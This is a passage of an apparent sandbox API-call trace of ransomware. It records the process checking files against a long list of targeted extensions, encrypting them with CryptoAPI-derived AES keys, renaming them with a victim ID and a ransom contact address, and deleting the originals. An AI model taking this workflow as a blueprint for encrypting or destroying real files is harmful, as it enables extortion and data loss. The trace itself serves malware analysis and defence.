	[0185.866] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.866] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.866] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.867] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.871] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x32cc, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x32cc, lpOverlapped=0x0) returned 1
	[0185.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.874] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb880) returned 1
	[0185.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.876] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.877] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.877] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.877] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x32cc, dwBufLen=0x32cc | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x32d0) returned 1
	[0185.878] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.878] RtlMoveMemory (in: Destination=0xfe0458, Source=0xfdd180, Length=0x32cc | out: Destination=0xfe0458) 
	[0185.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.878] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0458*, pdwDataLen=0x18bc0c*=0x32cc, dwBufLen=0x32d0 | out: pbData=0xfe0458*, pdwDataLen=0x18bc0c*=0x32d0) returned 1
	[0185.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.879] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.879] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.879] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0185.879] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.879] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.880] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.881] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0185.881] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.883] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0458*, nNumberOfBytesToWrite=0x32d0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0458*, lpNumberOfBytesWritten=0x18c068*=0x32d0, lpOverlapped=0x0) returned 1
	[0185.887] CloseHandle (hObject=0x2c0) returned 1
	[0185.887] CloseHandle (hObject=0x384) returned 1
	[0185.887] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx")) returned 1
	[0185.892] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx")) returned 0
	[0185.893] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbee42200, ftCreationTime.dwHighDateTime=0x1d96937, ftLastAccessTime.dwLowDateTime=0x4165330, ftLastAccessTime.dwHighDateTime=0x1d972fb, ftLastWriteTime.dwLowDateTime=0x4165330, ftLastWriteTime.dwHighDateTime=0x1d972fb, nFileSizeHigh=0x0, nFileSizeLow=0x172a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="hzOe.rtf", cAlternateFileName="")) returned 1
	[0185.893] lstrcmpW (lpString1="hzOe.rtf", lpString2="..") returned 1
	[0185.893] lstrcmpW (lpString1="hzOe.rtf", lpString2=".") returned 1
	[0185.893] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.893] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="hzOe.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\hzOe.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\hzOe.rtf"
	[0185.893] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\hzOe.rtf") returned 40
	[0185.893] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.894] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\hzOe.rtf", cchLength=0x28 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf") returned 0x28
	[0185.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.894] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.894] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf") returned="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf"
	[0185.894] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf") returned 40
	[0185.894] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.895] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.895] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0185.895] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.895] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw